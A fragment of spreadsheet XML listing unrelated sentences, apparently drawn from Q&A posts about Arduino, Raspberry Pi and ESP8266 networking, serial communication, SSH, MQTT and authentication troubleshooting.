i do not know whether the device has acknowledged or executed the command (neither the status)
What could be the solutions for this problem?</t>
  </si>
  <si>
    <t>We are doing a project where we move a servo motor to open and close a lock with Arduino and Bluetooth HC-06.</t>
  </si>
  <si>
    <t>This will cause an IO exception in Unity saying "Access Denied"  followed by errors of the Serial port isn't open.</t>
  </si>
  <si>
    <t>I have found an alternative  IotEdgeSecurityDaemon.ps1 script but before I start using that, I'd like to ask if anyone else has seen the same or similar problem with this particular setup.</t>
  </si>
  <si>
    <t>go to  manage window from my computer , check whether port has been properly detected or not</t>
  </si>
  <si>
    <t>It might be the case your organizations is configured to block non-secure connections (since you are using port 1883).</t>
  </si>
  <si>
    <t>This post mentions a similar problem, with a hackish solution to close Serial and re-open it.</t>
  </si>
  <si>
    <t>Especially malware robots that scan the web for security vulnerabilities, and email address harvesters used by spammers will pay no attention.</t>
  </si>
  <si>
    <t>One possible explanation that I'm wondering about; I've recently noticed that enabling AddressSanitizer indicates a stack-buffer-overflow when creating user events.</t>
  </si>
  <si>
    <t>When the CPU wants to enter a critical section, all it needs to do is mask its own IRQ input with CPSID, do what it needs, then unmask with CPSIE, at which point any pending IRQ from the NVIC will be taken immediately.</t>
  </si>
  <si>
    <t>I've always found WPA/WPA2 easy to setup and use, but people have reported WEP sometimes tricky to setup on Linux
You didn't say if you had a password or not on your SSID, but I'll assume you do.</t>
  </si>
  <si>
    <t>Where multiple
  SingleTact interfaces are to be connected to the same I2C bus then
  address 0x04 must be considered invalid
So, even in this case, the RTFM advice is the most important one...</t>
  </si>
  <si>
    <t>First, make sure that you are using the correct Baud rate for your serial communication or otherwise you will receive unreadable data.</t>
  </si>
  <si>
    <t>A Windows Live ID is the email address and password you use to sign in to any of the following:
    Xbox LIVE
    Zune
    Hotmail
    MSN
    Messenger
    Find My Phone
    OneDrive (formerly SkyDrive)</t>
  </si>
  <si>
    <t>I use also the mDNS to detect the IP addresses of the ESP8266 inside the network and here's the code :
I use my phone app as a client and the code work perfectly, I scan for the _SmartDimmerx2._tcp.local.</t>
  </si>
  <si>
    <t>But even a fixed-value start-of-packet nibble would (by itself) not be sufficient to (initially) identify (or verify) data packets.</t>
  </si>
  <si>
    <t>I finally got rid of the counter, and just started executing gc.login() on every single iteration of the loop, i.e.</t>
  </si>
  <si>
    <t>When I try to do so, I getthe error message ...
Fortunately for you, the device driver that does use that pin (that you want to use) has properly performed the GPIO reserve/request call to prevent a hijack.</t>
  </si>
  <si>
    <t>(Twisted has an event loop)  When data is received a registered handler is called, so 
you won't get full buffers and the blocking behavior you are experiencing.</t>
  </si>
  <si>
    <t>The function  starts the encrypted communication with the server on port 465 instead of the normal port 25 for unencrypted SMTP mail traffic.</t>
  </si>
  <si>
    <t>Once youve opened up the CORS option you should be able to whitelist URLs - enter your full localhost URL including the ports and https://.</t>
  </si>
  <si>
    <t>I have a database hosted by one.com with these settings:
PhpMyAdmin: https://dbadmin.one.com
Host: axelerate.be.mysql
Database: axelerate_be
Username: axelerate_be
Password: *****
I want to make connection with this database by using a php file runned by the LXTerminal of the raspberry pi.</t>
  </si>
  <si>
    <t>I try with the settings app (Wifi =&gt; Advanced =&gt; Wifi Direct) and I can see the raspberry as a peer too but the diference is that when I try to make the connection, the application request me a PIN code and I am able to make the connection if I introduce the pin returned by p2p_pin any in the raspberry.</t>
  </si>
  <si>
    <t>UDP library
Very easy and simple to use, but there is no validation if the packages received or not... (The Arduino library has a UDP class)
Using the client class
Arduino one is a server and Arduino 2 a client.</t>
  </si>
  <si>
    <t>Using the top bit of the command would allow a retry to be detected; if the PC sends 0x01 twice in succession, the Arduino won't execute the second but will simply send the ":0841A00A1E3C2891CAB2" response to indicate that it has executed that command.</t>
  </si>
  <si>
    <t>Variable envelope return path (VERP) is a technique to enable automatic detection of undeliverable e-mail addresses when sending email to multiple recipients.</t>
  </si>
  <si>
    <t>Under IPv4, the private IP address spaces were originally defined in an effort to delay IPv4 address exhaustion, but they are also a feature of IPv6, the next generation Internet Protocol.</t>
  </si>
  <si>
    <t>For IPv4 networks, the tethering normally works via NAT on the handset's existing data connection, so from the network point-of-view, there is just one device with a single IPv4 network address, though it is technically possible to attempt to identify multiple machines.</t>
  </si>
  <si>
    <t>A few suggestions, in order of expected helpfulness:
The Aircrack-ng suite (specifically, the airodump-ng tool) is a more appropriate tool for detecting whether the ESP8266 is broadcasting any wifi packets, as it can detect clients and APs (regardless of whether the client is connected to an AP or not, or whether an SSID is hidden or not).</t>
  </si>
  <si>
    <t>If I type the following string into the address bar of a web browser and hit enter, it adds the two data points to a bucket in Initial State:
http://insecure-groker.initialstate.com/api/events?accessKey=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&amp;bucketKey=YYYYYYYYYYYY&amp;Temp=275&amp;dTdt=2
I want to use the esp8266 connected to an arduino to do this programatically.</t>
  </si>
  <si>
    <t>I don't necessarily need to exchange any data, all I need to know is when the devices are very close or touching.</t>
  </si>
  <si>
    <t>backData is checked against the key for user2, not matching.</t>
  </si>
  <si>
    <t>One way is to check all the Mac addresses on the network.</t>
  </si>
  <si>
    <t>Use a unvailable port or device and you will fail.</t>
  </si>
  <si>
    <t>I've setup all the appropriate permissions and have had success running Python scripts from the directory.</t>
  </si>
  <si>
    <t>But I've failed all my attempts to get scipy installed on intel galileo gen 2.</t>
  </si>
  <si>
    <t>14     59  PCD_Authenticate() failed: Timeout in communication.</t>
  </si>
  <si>
    <t>13     55  PCD_Authenticate() failed: Timeout in communication.</t>
  </si>
  <si>
    <t>If I go to my browser on my raspberry pi and try to establish the websocket, this error does not occur.</t>
  </si>
  <si>
    <t>Here is what I've tried so far (there should be an open ssh port on the device), but I haven't found the Raspberry Pi yet.</t>
  </si>
  <si>
    <t>I am using Raspberry pi zero w and R305 fingerprint sensor for this project.</t>
  </si>
  <si>
    <t>I have been trying to connect my raspberry Pi 3 to the R307 Fingerprint Sensor module using UART.</t>
  </si>
  <si>
    <t>I use mDNS in order to not care about the wifi's IP address but I have yet to find anything that would still allow me to do an OTA update when the wifi has changed its password from the one coded in the .ino file.</t>
  </si>
  <si>
    <t>mqtt CONNECTACK fails after handshake success, using ECC x509 with mbed TLS
I am trying to connect to IoT Hub using an STM32 board.</t>
  </si>
  <si>
    <t>After that, the RPi turns off the access point and connects to the wifi.</t>
  </si>
  <si>
    <t>1009           1 is a data block:
PCD_Authenticate() failed: Timeout in communication.</t>
  </si>
  <si>
    <t>1 is a data block:
PCD_Authenticate() failed: Timeout in communication.</t>
  </si>
  <si>
    <t>1 is a data block:
PCD_Authenticate() failed: Timeout in communication.
"</t>
  </si>
  <si>
    <t>I'm experimenting with locking on an ESP32.</t>
  </si>
  <si>
    <t>I found why I couldn't decrypt the packet.</t>
  </si>
  <si>
    <t>Turns out it was the ultrasonic sensors.</t>
  </si>
  <si>
    <t>As a general piece of advice, code is really difficult to control access to.</t>
  </si>
  <si>
    <t>Whenever I run the code below, it says "Invalid serial port", though it is valid?</t>
  </si>
  <si>
    <t>I believe the ARP packets are as described here, implying that some devices are missing MAC addresses for other devices on the network.</t>
  </si>
  <si>
    <t>It's like if at some point the serial port is corrupted.</t>
  </si>
  <si>
    <t>I have been successfully able to send sensor data to GAE datastore, but only when login is DISABLED in the webapp.</t>
  </si>
  <si>
    <t>Currently I have a WiFi dongle attached to the Pi so that I can SSH from my desktop and a USB to Serial connector coming out of the other USB port.</t>
  </si>
  <si>
    <t>Currently I'm working trying to sync my gmail account to a LED notifier.</t>
  </si>
  <si>
    <t>There will be only one commander in the network, but is there anyway to set sensor xbee [as we can configure destination address] so that it will only respond to the authentic commander?</t>
  </si>
  <si>
    <t>The solutions were asking to change the permissions on the serial port.</t>
  </si>
  <si>
    <t>I want to send sensor's data from intel Galileo running on windows to Azure.</t>
  </si>
  <si>
    <t>I'm sending the data to port 8080 on the pi itself, but when I navigate my browser to localhost:8080, it asks for authentication.</t>
  </si>
  <si>
    <t>The wifi network it needs to be on is on a hidden SSID that has no passkey, and it needs to setup for a static ip address.</t>
  </si>
  <si>
    <t>The connection has to be established before the script is executed.</t>
  </si>
  <si>
    <t>Check OAuth credentials, spreadsheet name, and make sure the spreadsheet is shared to the client_email address in the OAuth .json file!</t>
  </si>
  <si>
    <t>I am trying to acquire rs232 data from a device connected to the ESP8266 (data will then be sent our via http/wifi).</t>
  </si>
  <si>
    <t>That is, I can no longer detect an ARP from them, nor do I appear to be able to detect their MAC address by sniffing it.</t>
  </si>
  <si>
    <t>In that way the PI can use the DeviceKey from the config file, and the sensor reading and then send the data to the IOT HUB.</t>
  </si>
  <si>
    <t>However once I close the page using "file.close()" I can't access it again, presumably because the wormhole service is accessing it.</t>
  </si>
  <si>
    <t>I'm able to perform ssl &amp; websocket handshake.</t>
  </si>
  <si>
    <t>The data from the I2C will corrupt when communicating with serial port.</t>
  </si>
  <si>
    <t>I am building a student attendance system using a fingerprint sensor.</t>
  </si>
  <si>
    <t>In this app I can get WiFi to work and to connect with ESP module using SSID and password authorization.</t>
  </si>
  <si>
    <t>When I run sudo gammu --identify after entering the PIN, I even get a SIM IMSI, so it seems to be able to talk to the SIM but I just can't get the SMS sending to work.</t>
  </si>
  <si>
    <t>The access from the PC to the COM-port seems not to be a problem, because the port is blocked, if I try to get access by another application.</t>
  </si>
  <si>
    <t>The value for the first one are IOTHUB_CLIENT_CONNECTION_AUTHENTICATED and IOTHUB_CLIENT_CONNECTION_UNAUTHENTICATED, which I assume simply means "connected" and "not connected".</t>
  </si>
  <si>
    <t>I am currently trying to create a COM port connection between my PC and the Intel Joule platform.</t>
  </si>
  <si>
    <t>A snippet of the PHP code:
    $conn_str="host=localhost port=5432 dbname=my_db_name user=my_user_name password=my_password";
    $db = pg_connect($conn_str);
    if(!$db){
        $errormessage=pg_last_error();
        echo "Error 0: " .</t>
  </si>
  <si>
    <t>On the Android side, I have the MAC address of the RPi and I'm trying to connect to the server using this code:
UUID is the same as on the server-side, and i've also tried using the createInsecureRfcommSocket method.</t>
  </si>
  <si>
    <t>I have setup my Pi for SSH remote host development using NetBeans.</t>
  </si>
  <si>
    <t>The main idea is to receive the TLS key, SSID and password to esp8266 by light.</t>
  </si>
  <si>
    <t>The sensors use I2c communication, therefore I can't have them on the same I2C pins since they have identical addressess.</t>
  </si>
  <si>
    <t>But before the screen switches i am want to validate a user name and pin.</t>
  </si>
  <si>
    <t>I know the IP address of my pi and it's working when I use ssh option, can anyone shed some light on my problem?</t>
  </si>
  <si>
    <t>I also tried simply switching the Rx and Tx pins just to be safe.</t>
  </si>
  <si>
    <t>I have dummy information being passed since I'm not connected to any sensors.</t>
  </si>
  <si>
    <t>and the phone detect the esp with its IP addresses.</t>
  </si>
  <si>
    <t>But I see no possibility to configure a pin as an edge counter.</t>
  </si>
  <si>
    <t>But the 'serial.print()' don't show any credentials.</t>
  </si>
  <si>
    <t>What do you think is preventing a connection to the database from being established?</t>
  </si>
  <si>
    <t>2-Assuming the login was successful, why i do not see the output from the command?</t>
  </si>
  <si>
    <t>I also don't want "attackers" to be sending commands that I've sent before.</t>
  </si>
  <si>
    <t>I have read about the socket.io 25 second handshake/disconnect, but don't know if that's what's going on here.</t>
  </si>
  <si>
    <t>I need to hide vnc server in my raspbian os.i tried several ways and didn't find any find any luck</t>
  </si>
  <si>
    <t>Amazon defines this error: "Cannot establish a secure connection with the server.</t>
  </si>
  <si>
    <t>Which then, a user can send the wifi credentials to for an Internet connection.</t>
  </si>
  <si>
    <t>The original admin account can login fine, but gets and error 530 because it will not let me add an internet email address to that user.</t>
  </si>
  <si>
    <t>If I actually send it back, it's no longer private.</t>
  </si>
  <si>
    <t>I tried connecting using just the Shared Access Key in my connection string, but this did not work (no connection).</t>
  </si>
  <si>
    <t>I have just created a SSH connection between my Raspberry Pi 3 b+ and my computer using WiFi.</t>
  </si>
  <si>
    <t>Secondly, the reason I have it in a loop for now is because I will be sending a command via ssh to multiple Raspberry Pi's.</t>
  </si>
  <si>
    <t>This a localhost.. so no port 843 security policy non-sense going on as far as I know?</t>
  </si>
  <si>
    <t>I am trying to verify the Arduino code in ADS1198 and Arduino Due.</t>
  </si>
  <si>
    <t>I want to set eth0 of RPI (Raspbian Stretch) to be DHCP, my goal is that when I will connect any device that communicates using TCP/IP protocol, that device will receive an IP address.</t>
  </si>
  <si>
    <t>Once On is should start scanning for ble peripheral devices.</t>
  </si>
  <si>
    <t>The Arduino sends "I" constantly until it receives an "I" indicating that it has been identified.</t>
  </si>
  <si>
    <t>But I can't get reliable device status in the case when a connected device was disconnected and connected back within ~ 40 seconds.</t>
  </si>
  <si>
    <t>The use of  causes an entirely unrelated variable to occasionally appear corrupted in the serial output.</t>
  </si>
  <si>
    <t>Is had to do with firewall connectivity issue on my connection string not to receive message?</t>
  </si>
  <si>
    <t>I have the following code:
I get the following output from print:
bytearray(b'{"ssid": "mySSID", "password": "myPASSWD"}\xff\xff\xff\xff\xff\xff')
What I want to do is get the json in buff.</t>
  </si>
  <si>
    <t>I've tried the flag for Python library to allow insecure connection with no luck.</t>
  </si>
  <si>
    <t>First, I configured my Pi to become a WiFi access point, so that users can connect to Pi's WiFi AP.</t>
  </si>
  <si>
    <t>Netbeans will try to establish a connection to the Raspberry Pi via SSH so you must ensure that SSH is enabled.</t>
  </si>
  <si>
    <t>YOu might also need to change the permissions on the serial port mapped to your Arduino:
sudo chmod 777 /dev/ttyACM0
Where ttyACM0 is the name of your device.</t>
  </si>
  <si>
    <t>Take the following mac address:
00:19:E3: is one of the registered mac address for apple devices.</t>
  </si>
  <si>
    <t>You are missing the  and Sec-WebSocket-Version headers, key part of the WebSocket protocol handshake.</t>
  </si>
  <si>
    <t>Noise on this connection is the most likely problem or garbled serial messages.</t>
  </si>
  <si>
    <t>In any sane setup of that, you know ahead of time which digital pin the LED is going to be on.</t>
  </si>
  <si>
    <t>The gateway address is the address of your router which is connected to the internet.</t>
  </si>
  <si>
    <t>UPDATE 1
First you have to debug your serial communication.</t>
  </si>
  <si>
    <t>Port 9002 closed by firewall or antivirus.</t>
  </si>
  <si>
    <t>You router apparently doesn't let you access the (forwarded) port of you external IP address from within your LAN.</t>
  </si>
  <si>
    <t>So, you need to know your RPi:s address, network mask and gateway (which is another name for router).</t>
  </si>
  <si>
    <t>Thanks to @ikra insight on checking the apache log file, which lead me to discover that the root cause was permission access.</t>
  </si>
  <si>
    <t>every arduino ethernet need to have unique ip and mac address</t>
  </si>
  <si>
    <t>After sending the AT+CWLAP command, ESP8266 will answer with a list of all available AP's detected.</t>
  </si>
  <si>
    <t>Almost all attacks stopped when I moved off of port 22.</t>
  </si>
  <si>
    <t>To make it legit, change if (Serial.available() &gt; 0) to while (Serial.available() &gt; 0).</t>
  </si>
  <si>
    <t>Noise will limit the XBee modules' ability to send, but won't corrupt the data sent wirelessly.</t>
  </si>
  <si>
    <t>So, if you used wifi.sta.config("ssid", "password") in the past the device will try to connect to the WiFi "ssid" and obtain an IP (from the DHCP server) whenever it boots.</t>
  </si>
  <si>
    <t>It's like your home: your street and your address are public, but it's better keeping doors closed.</t>
  </si>
  <si>
    <t>The most sensible solution would be to switch to a host without such protection.</t>
  </si>
  <si>
    <t>Provide your code or more info about how you are connecting and have confirmed that your device is connected and sending data.</t>
  </si>
  <si>
    <t>Traditionally the username is  and an email address is used as a password.</t>
  </si>
  <si>
    <t>NOTE: Nginx is recommended as this can proxy websocket connections.</t>
  </si>
  <si>
    <t>Your code
only works because conn:connect is non-blocking and because it takes some time until the connection is established.</t>
  </si>
  <si>
    <t>You will be able to provide requested IP address to your device so you need to declare your device's "MAC address" also.</t>
  </si>
  <si>
    <t>I think it is not possible to send push notification w/o device token.</t>
  </si>
  <si>
    <t>Then have another, more secure device on the network connect to the ESP8266 and send it the fan speed.</t>
  </si>
  <si>
    <t>The Port, by default is 8883 as the connection is secure and done over TLS.</t>
  </si>
  <si>
    <t>According to Access GPIO pins without root.</t>
  </si>
  <si>
    <t>I am not a Lua expert, but I think you are registering your "sent" callback after you send the response.</t>
  </si>
  <si>
    <t>It's awesome that AWS now supports MQTT connections on port 443 without having to utilize websockets (and the need for SigV4 credentials).</t>
  </si>
  <si>
    <t>The essential parts are propper serial connection and - as soon as that works - the authentication within the "fona" file!</t>
  </si>
  <si>
    <t>A valid host is either an IP address or a domain.</t>
  </si>
  <si>
    <t>Right now your code constantly attempt to connect to a wifi access point.</t>
  </si>
  <si>
    <t>The getent passwd output consists of one line per matched user.</t>
  </si>
  <si>
    <t>User authentication with email addresses instead of usernames in Django.</t>
  </si>
  <si>
    <t>Biometric modality that matches images of finger tips.</t>
  </si>
  <si>
    <t>EINVAL
Socket is not listening for connections, or addrlen is invalid (e.g., is negative).</t>
  </si>
  <si>
    <t>When a connection is established between an SSLSocket and an SSLSocketServer, the cipher suite to be used is determined via "handshaking."</t>
  </si>
  <si>
    <t>If the first user attempts to lie and say otherwise, it can be proven that it was indeed user 1 that sent the data.</t>
  </si>
  <si>
    <t>Layered socket factory for TLS/SSL connections, based on JSSE.</t>
  </si>
  <si>
    <t>Hardware
A hardware packet sniffer is physically connected to the network by connecting it to a router or switch.</t>
  </si>
  <si>
    <t>Connecting to MySQL often requires a username, a password, and a host to connect to (and sometimes a specific port).</t>
  </si>
  <si>
    <t>Xshell is a powerful terminal emulator that supports SSH, SFTP, TELNET, RLOGIN and SERIAL.</t>
  </si>
  <si>
    <t>See How to validate an email address in PHP.</t>
  </si>
  <si>
    <t>It provides security protection and implemets connection semantics over UDP.</t>
  </si>
  <si>
    <t>All packets on the network, even those destined for other hosts, would be accessible through this mechanism.</t>
  </si>
  <si>
    <t>Geolocation usually works by automatically looking up an IP address on a WHOIS service and retrieving the registrant's physical address.</t>
  </si>
  <si>
    <t>Now I would like to add an authentication step, a simple pin or passkey, to allow the connection only to those who know it.</t>
  </si>
  <si>
    <t>Wed Jan 16 04:33:04.997 [signalProcessingThread] removeJournalFiles
Wed Jan 16 04:33:05.053 [conn4] end connection 127.0.0.1:56470 (0 connections now open)
Wed Jan 16 04:33:05.223 [signalProcessingThread] shutdown: removing fs lock...</t>
  </si>
  <si>
    <t>If this self test does not arrive, a disconnection from the broker is assumed, and a reconnection is initiated.</t>
  </si>
  <si>
    <t>Additionally, what is the best way to Ssh into the raspberry Pi to observe the scripts terminal output?</t>
  </si>
  <si>
    <t>For the sake of completion, to establish communication between your laptop and Arduino Uno w/BT shield:
Pair your laptop with the bluetooth shield
Upload Arduino code with shield detached.</t>
  </si>
  <si>
    <t>I have confirmed there is no firewall and the addresses are correct, including network masks.</t>
  </si>
  <si>
    <t>In this way the OpenHAB system would be the monitoring service and Eyez-On would report any alarm status updates to the OpenHAB.</t>
  </si>
  <si>
    <t>In other words the default instance does not listen to public IP Addresses.</t>
  </si>
  <si>
    <t>If this is the case, click "Edit trust relationship" (seen in the image below) and edit so that the value for the key "cognito-identit.amazonaws.com::aud" matches your identity pool ID.</t>
  </si>
  <si>
    <t>I have built a Infrared Receiver and transmitter using this sparkfun steps on Arduino like this steps on sparkfun
I can now receive the IR codes as well as transmit the IR Codes.</t>
  </si>
  <si>
    <t>After some debugging I found out that the driver signature which Windows checks has expired on December 19, 2013.</t>
  </si>
  <si>
    <t>CreateFile is used actually used to "open the serial port" (meaning gaining exclusive access) since there isn't anything to really create.</t>
  </si>
  <si>
    <t>This is the code where the error is occurring:
Every time I compile the program, the handle to the opened serial port == INVALID_HANDLE_VALUE.</t>
  </si>
  <si>
    <t>But the code will be really simple once you got what the hardware will look like (in the end, it's just "wait for the correct passcode, then open the safe, then close it again").</t>
  </si>
  <si>
    <t>It keeps
an internal list of LoginListeners object that are notified on
LoginEvents during the whole process: login started, canceled,
succeeded and failed.</t>
  </si>
  <si>
    <t>When trying to debug from Visual Studio I can see the following output:
First-chance exception at 0x77CC342A (ntdll.dll) in WindowsIoTDemo.exe: 0xC0000139: Entry Point Not Found.</t>
  </si>
  <si>
    <t>The request needs a body if it is sending additional data to the server, for instance, if sending information entered into a form.</t>
  </si>
  <si>
    <t>but when i browse to the ip of the pi  with the port number 500, in my case 
http://192.168.7.137:5000/
The webpage displayes Bad Request (Invalid host)</t>
  </si>
  <si>
    <t>I tried waiting 2 seconds after opening the window, and then calling readVerify(SerialPort s), but for some reason it reads the print, verifies, and then opens the window.</t>
  </si>
  <si>
    <t>With AES encryption, data length was 268 bytes and resulted in an output of "Failed sending SELECT AID", which is a false error since I was able to retrieve the AID request and APDU header.</t>
  </si>
  <si>
    <t>Yeah I've had that problem before, simply turn off the bot from everything you're hosting it on, you were probably logged in on it multiple times, that might be because you're running it on a raspberry pi and did not properly shut it.</t>
  </si>
  <si>
    <t>In particular disabling the kernel from using the serial port for terminal use this would seem to apply:
The following steps (based on a clean 2012-07-15-wheezy-raspbian install
Open a terminal on the Raspberry, or connect to Raspberry Pi through SSH.</t>
  </si>
  <si>
    <t>This is how I did it (it's quite a hack, please advice me to do it better):
on my PC:
...wait some quite long time...
$ vagrant ssh
    $ cp /var/kernel_build/results/kernel-20161003-100112/rpi2_3/kernel7.img /vagrant/
    $ exit
$ sudo cp kernel7.img /mnt
then on the SD card:
# mv /var/lib/docker /var/lib/docker~
# mkdir -p /var/lib/docker /tmp/docker /tmp/work
# mount -t overlay -o lowerdir=/var/lib/docker~,upperdir=/tmp/docker,workdir=/tmp/work overlay /var/lib/docker
# docker daemon --storage-driver aufs</t>
  </si>
  <si>
    <t>However, while it could easily handle the geofencing aspect, I don't see how it could actually perform the necessary triggers to arm and disarm the webcam alarm which requires sending those two HTTP requests.</t>
  </si>
  <si>
    <t>The manual describes a "combo" mode for sending both keyboard and mouse codes, and also mentions that you can send 16 additional HID Consumer key codes in the combo and keyboard modes.</t>
  </si>
  <si>
    <t>These addresses are characterized as private because they are not globally delegated, meaning that they are not allocated to any specific organization, and IP packets addressed with them cannot be transmitted through the public Internet.</t>
  </si>
  <si>
    <t>Relying on base64 encoding, it is considered from the beginning as weak and unsecure, but it has a legitimate use on trusted connections (either on encrypted tunnels such as SSL, or unencrypted on a closed network).</t>
  </si>
  <si>
    <t>Jun 17 11:09:45 raspberrypi nginx[773]: nginx: [emerg] BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem"
Jun 17 11:09:45 raspberrypi nginx[773]: nginx: configuration file /etc/nginx/nginx.conf test failed
Jun 17 11:09:45 raspberrypi systemd[1]: nginx.service: Control process exited, code=exited status=1
Jun 17 11:09:45 raspberrypi systemd[1]: Failed to start A high performance web server and a reverse proxy server.</t>
  </si>
  <si>
    <t>Is there any way to get an access to the template data from the Grove fingerprint sensor?</t>
  </si>
  <si>
    <t>I'm not going to use raspberry fingerprint sensor.</t>
  </si>
  <si>
    <t>(192.168.1.4) at 50:4c:a3:57:5d:44 on en0 ifscope [ethernet]
Find the mac address from your device and use the IP to ssh into it.</t>
  </si>
  <si>
    <t>In my processor i short rx-tx of ttyS0 for loop back coonection checking.</t>
  </si>
  <si>
    <t>I also checked that my Macbook has firewall turned off.</t>
  </si>
  <si>
    <t>I have a test script to verify my servo setup.</t>
  </si>
  <si>
    <t>The server uses a software like SourceAFIS to match the fingerprint.</t>
  </si>
  <si>
    <t>I can however connect when I use my network IP address - found using
It works as expected.</t>
  </si>
  <si>
    <t>The problem that I have esque when I connect the plate protoboard to the lock, the LED is turned on, but the lock is immovable.</t>
  </si>
  <si>
    <t>I thought that the Test Console app was successfully connected but it turns out that isn't the case.</t>
  </si>
  <si>
    <t>---&gt; Interop+OpenSsl+SslException: SSL Handshake failed with OpenSSL error - SSL_ERROR_SSL.</t>
  </si>
  <si>
    <t>The reported error is:
DEP6957: Failed to connect to device [IP Address] using Universal
  Authentication.</t>
  </si>
  <si>
    <t>Is there a way to decode this message, or am I not sending it properly?</t>
  </si>
  <si>
    <t>I checked MYSQL server's IP address, port and username-password.</t>
  </si>
  <si>
    <t>When you get a packet check it for validity before outputting it.</t>
  </si>
  <si>
    <t>Follow these steps,
Check the ip address of your Raspberry pi from your router.</t>
  </si>
  <si>
    <t>Finding users by ID, username, or email.</t>
  </si>
  <si>
    <t>I have been trying to make this code I have to only email once after the Door pin has been tripped.</t>
  </si>
  <si>
    <t>To lock it you need to enter that alarm back in.</t>
  </si>
  <si>
    <t>I have connected USB to Rpi for serial communication(reading fingerprint).</t>
  </si>
  <si>
    <t>How to identify each Raspberry Pi and send the user's command (e.g., Bedroom Light On) to the correct Raspberry Pi.</t>
  </si>
  <si>
    <t>I added a configuration with remote raspberry's IP address, username, password and run as sudo checked.</t>
  </si>
  <si>
    <t>Also, you will find you can't really use any port under 1024 without superuser permissions (you won't have these unless you've rooted your device).</t>
  </si>
  <si>
    <t>You need to fix your code so that you don't try to open the connection if the device was not found.</t>
  </si>
  <si>
    <t>Some blink rates just indicate that you're associated or have established a network.</t>
  </si>
  <si>
    <t>Attempts to independently and directly access the device /dev/whatever will fail as busy.</t>
  </si>
  <si>
    <t>I was fortunately enough to find someone emailed me a copy of the V538 firmware and was able to downgrade again.</t>
  </si>
  <si>
    <t>If you don't know how, take a look on the Drive Help, hosting webpages
EDIT:
The permissions are ok.</t>
  </si>
  <si>
    <t>Failed to configure Ethernet using DHCP
Or does it say this?</t>
  </si>
  <si>
    <t>You could use an ESP8266 to perform both the network connection and encryption.</t>
  </si>
  <si>
    <t>Have you checked both devices to ensure that they have unique mac addresses?</t>
  </si>
  <si>
    <t>Do you know how android device checks if connected wifi is connected to internet?</t>
  </si>
  <si>
    <t>Failed to configure Ethernet using DHCP.</t>
  </si>
  <si>
    <t>You need to add a software to debounce the switch.</t>
  </si>
  <si>
    <t>Library that patches  authentication modules to allow user authentication with email addresses instead of usernames.</t>
  </si>
  <si>
    <t>Possible results include "success", "error", "input", "login", "none".</t>
  </si>
  <si>
    <t>However, using these functions I get about 50% corrupted frames when I receive them on the Java side.</t>
  </si>
  <si>
    <t>The following is the code for the class that tries to establish the SSH connection.</t>
  </si>
  <si>
    <t>The socket connection is established 'first time' when trying from a laptop.</t>
  </si>
  <si>
    <t>These are some parts of my code:
I would like instead of the actual password, to print starts on the lcd scene.</t>
  </si>
  <si>
    <t>Arduino is receiving fine and serial communication verified by minicom.</t>
  </si>
  <si>
    <t>Ideal scenerio: Users can append their google account email address to the arduino code, and data that is sent from the arduino to the datastore is visible by this Google account only, when the user logs into the app with their Google account.</t>
  </si>
  <si>
    <t>I got Intel Galileo from Microsoft IoT program, connection is working, I can ping it, watch files on SD card, do something via Telnet, etc.</t>
  </si>
  <si>
    <t>The script needs to be none-blocking, and accesses the GPIO pins, so needs to run as root.</t>
  </si>
  <si>
    <t>Either ways once this malicious central has connected to peripherial the Genuine Central will not be able to as each peripherial.</t>
  </si>
  <si>
    <t>Can i make like a "fake" serial port, or something that redirects the data?</t>
  </si>
  <si>
    <t>If the first sensor goes off before the second, I know someone is entering the room, and the code sends a +1 to a file online.</t>
  </si>
  <si>
    <t>I have been looking for a solution for establising Wifi Communication between and Android Phone and Arduino with Wireless Transceiver module (no wifi shield)
Need help in 
Android code to establish such a connection.</t>
  </si>
  <si>
    <t>And then, the server recognizing the header would respond, thus its IP address would be detected automatically?</t>
  </si>
  <si>
    <t>Do I need to give special permissions to www-data to send serial data?</t>
  </si>
  <si>
    <t>After executing the code an error occurs which as follows:
I think connection is not established between raspberry python script and mysql database in wamp server on my desktop.</t>
  </si>
  <si>
    <t>I am attempting to create a wireless sensor network using ESP8266 devices and the Sming framework.</t>
  </si>
  <si>
    <t>We then see the CONNACK with a return code of 5 being sent to Paho and Azure dropping the connection soon thereafter.</t>
  </si>
  <si>
    <t>I would like to establish a bluetooth connection from an android device to a Raspberry Pi without pairing.</t>
  </si>
  <si>
    <t>If a module has not responded to the network discovery, it will be sent again every 30 seconds (in most tests, after 60 seconds, all nodes are discovered.</t>
  </si>
  <si>
    <t>I have sniff a lot of packets using AVRUSBSTICK with default firmware and save that in a .dump file.</t>
  </si>
  <si>
    <t>That code looks like:
What I'd like is to be able to get all registered devices, keep them in memory, and just listen for connection events.</t>
  </si>
  <si>
    <t>For the moment the methods I have tried are serial over USB or HID packets over USB.</t>
  </si>
  <si>
    <t>I think the problem is detect&gt;0 continuously, and that is jamming serial connection somehow.</t>
  </si>
  <si>
    <t>How can I setup secure connection with site of WSO2IoT device managnament?</t>
  </si>
  <si>
    <t>I'm building a home alarm system and I have 2 motion sensors.</t>
  </si>
  <si>
    <t>I am trying to send data to cloud using secure websocket (wss).</t>
  </si>
  <si>
    <t>However within Python I still can't get a connection, I typed the following into the interpreter:
import pyodbc
conn = pyodbc.connect('DRIVER=FreeTDS;SERVER=NAME;DATABASE=dbName;UID=user;PWD=password')
Then when I type this cu = conn.cursor() I get an error:
AttributeError: 'NoneType' object has no attribute cursor</t>
  </si>
  <si>
    <t>When I enabled mbedtls debugs, I am seeing that everything is fine and handshake is completed.</t>
  </si>
  <si>
    <t>As a side note, i have to use the legacy WiFi-Direct implementation with SSID and Passphrase.</t>
  </si>
  <si>
    <t>Whenever I push to my github account on my mac I do not need to enter email/password every time.</t>
  </si>
  <si>
    <t>When compiling for Arduino, I get no errors and values read from sensors are signed.</t>
  </si>
  <si>
    <t>It seems that IBM recently stopped to accept non TLS connections to the MQTT borker for security reasons.</t>
  </si>
  <si>
    <t>I wanted to assure the security of the cookies that are saved on the user's device (no passwords, but an email address is in there).</t>
  </si>
  <si>
    <t>I tried disabling the receive pin before setting the LEDs and enabling it afterwards but that didn't help.</t>
  </si>
  <si>
    <t>RN42 Wireshark Snapshot
Wiimote Wireshark Snapshot
All,
I am attempting to program an RN42 to spoof a nintendo Wiimote.</t>
  </si>
  <si>
    <t>setup
Hardware
PIN 16 (GPIO 26) as IN
PIN 6 as GND
2 open Jumper wires on the pins for better debugging.</t>
  </si>
  <si>
